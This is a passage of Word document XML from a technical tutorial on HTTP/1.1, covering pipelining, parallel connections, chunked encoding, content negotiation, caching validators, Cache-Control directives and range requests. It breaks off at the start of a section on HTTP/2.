        <w:t>head-of-line blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>. The fast small responses must wait for the slow large response because the server must maintain response ordering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD005E3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why pipelining was abandoned in practice:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> HOL blocking made pipelining unreliable for mixed workloads. Proxies often didn't implement it correctly. Most browsers never enabled it by default (Chrome disabled it in 2011, Firefox in 2017). HTTP/1.1 pipelining is effectively dead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307EDAC3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The browser workaround — multiple parallel connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9B4A14" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Browsers opened </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multiple TCP connections per domain</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (HTTP/1.1 spec recommends 2, browsers typically use 6) to parallelize requests across connections. Each connection still suffers HOL blocking, but with 6 connections, you can have 6 requests in flight simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19758F93" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>This workaround has its own costs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E11B79E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="820"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>6 TCP handshakes instead of 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BE119A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="820"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>6 TLS handshakes (for HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB5F552" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="820"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>6 separate slow-start progressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3591235B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="820"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>TCP's congestion control treats each connection independently — 6 connections can be more aggressive than one connection should be, appearing as DDoS traffic to network equipment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C06285C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="820"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain sharding</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (serving resources from multiple subdomains to exceed per-domain connection limits) was a common HTTP/1.1 optimization that is actively harmful for HTTP/2 (more on this later).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33472425" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/1.1 Key Features — Deep Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B42674C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chunked Transfer Encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D81AFDE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>When the server doesn't know the response size upfront (dynamically generated content, streaming), it uses chunked encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0344A8A6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C06A957" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269B61ED" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32087A1F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="0A41B382" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>1a\r\n               (size of chunk 1 in hex: 26 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15903734" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>abcdefghijklmnopqrstuvwxyz\r\n  (chunk 1 data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A2897A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>10\r\n               (size of chunk 2 in hex: 16 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E80E103" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>0123456789abcdef\r\n (chunk 2 data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61452C2B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>0\r\n                (terminal chunk — size 0 means end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC6608" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A316C7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Each chunk is prefixed with its size in hexadecimal. The Content-Length header is omitted because the length is unknown. The receiver knows the body is complete when it sees a zero-size chunk. This enables </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>streaming responses</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> — the server can start sending data before it has computed or received the full response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AD89E9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Content Negotiation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A90A3A3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/1.1 formalizes content negotiation — the client advertises its capabilities and the server selects the best representation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E25E96" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C536713" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A621CA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6B0CB7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Accept-Language: en-US, en;q=0.9, fr;q=0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD38327" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Accept-Charset: utf-8, iso-8859-1;q=0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5B2B43" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The q value is a quality factor (0.0–1.0) indicating preference strength. The server reads these headers and responds with the best match, declaring what it chose via Content-Type, Content-Encoding, Content-Language response headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609776BD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Vary header and caching interaction:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> When the server uses request headers to select a response variant, it must declare which headers it used via Vary: Accept-Encoding, Accept-Language. Caches (proxy caches, CDNs) store separate entries for each Vary header combination, ensuring clients get the correct variant from cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB322DA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conditional Requests and Caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4CD824" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/1.1 caching is sophisticated — built around the concept of </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cache validators</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>freshness</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0CB9D7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ETags:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> The server assigns an opaque token (hash of content, version number) to a response. Client stores the ETag. On subsequent requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724241FF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EACC1E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>If-None-Match: "etag-value-abc123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A59E19" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Server compares the ETag against the current content. If unchanged: 304 Not Modified (no body). If changed: 200 OK with new content and new ETag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AF0105" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strong vs Weak ETags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C6F1C8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="821"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Strong ETag ("abc123"): Content is byte-for-byte identical across representations. Can be used for Range requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F36851C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="821"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Weak ETag (W/"abc123"): Content is semantically equivalent but may differ in minor ways (trailing whitespace, different gzip compression). Cannot be used for Range requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299D5BE3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Last-Modified:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Timestamp-based validation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DAEFB4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2A96DF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>If-Modified-Since: Mon, 01 Jan 2024 00:00:00 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EAB19E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Less precise than ETags (1-second granularity, timezone issues, clock synchronization required between client and server).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ACD49C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cache-Control directives (the full semantics):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31655930" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181B4B4D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cache-Control: max-age=3600           (cache for 3600 seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2479AC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cache-Control: no-cache               (must revalidate before serving — misleadingly named)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145CBE3D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cache-Control: no-store               (don't cache at all — truly no caching)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FADC36" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cache-Control: private                (only browser cache, not shared proxies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DEEA58" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cache-Control: public                 (any cache can store this)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D10CEF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cache-Control: must-revalidate        (don't serve stale even if revalidation fails)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE9F3EE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cache-Control: stale-while-revalidate=600  (serve stale up to 600s while revalidating)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303FD9C3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cache-Control: stale-if-error=86400   (serve stale up to 86400s if origin errors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C91E1B0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cache-Control: immutable              (content will never change — skip revalidation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238BDA3B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>no-cache is the most commonly misunderstood directive:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> It does NOT mean "don't cache." It means "cache the response but ALWAYS revalidate before serving." A cached response with no-cache is served only after a successful 304 Not Modified from the origin. no-store means truly "don't cache."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473FD33D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>immutable is the most powerful performance optimization:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> For versioned assets (where the URL changes when content changes, like /app.a3b4c5d6.js), immutable tells the browser to never revalidate this resource — not even on force-refresh. The URL is the version. If the content changes, the URL changes. Combined with a long max-age:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7697A1C6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3226283C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Cache-Control: max-age=31536000, immutable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE250A6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>This resource is cached for 1 year and never revalidated. Perfect for content-addressed URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113CDBC1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Range Requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C740DF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/1.1 supports requesting a partial resource:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051088FA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666389C1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>GET /video.mp4 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A88E07" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Range: bytes=0-1023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445D5F03" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Server responds with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D12BFF8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635B6AAD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/1.1 206 Partial Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45186A08" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Content-Range: bytes 0-1023/10485760</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A8800F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Content-Length: 1024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F45A068" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Used by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D279146" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="822"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Video players:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Seek to position without re-downloading the entire file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FCD597" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="822"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Download resumption:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Resume a partially downloaded file after network interruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9ACD50" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="822"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parallel downloading:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Multiple range requests simultaneously to parallelize large file downloads (aria2c, download managers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC3262B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The server must indicate support for range requests with Accept-Ranges: bytes in its response. A server that doesn't support range requests returns Accept-Ranges: none.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C0AA1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 — The Binary Multiplexing Revolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E506F25" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>HTTP/2 (RFC 7540, 2015) was developed by Google as SPDY and is a </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>complete reimplementation of HTTP's transport</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t>, while keeping the same semantics (same methods, headers, status codes). Its wire format is entirely different from HTTP/1.1 — binary instead of text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC4C22B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The core architectural change: Streams, Frames, and Multiplexing</w:t>
      </w:r>
    </w:p>
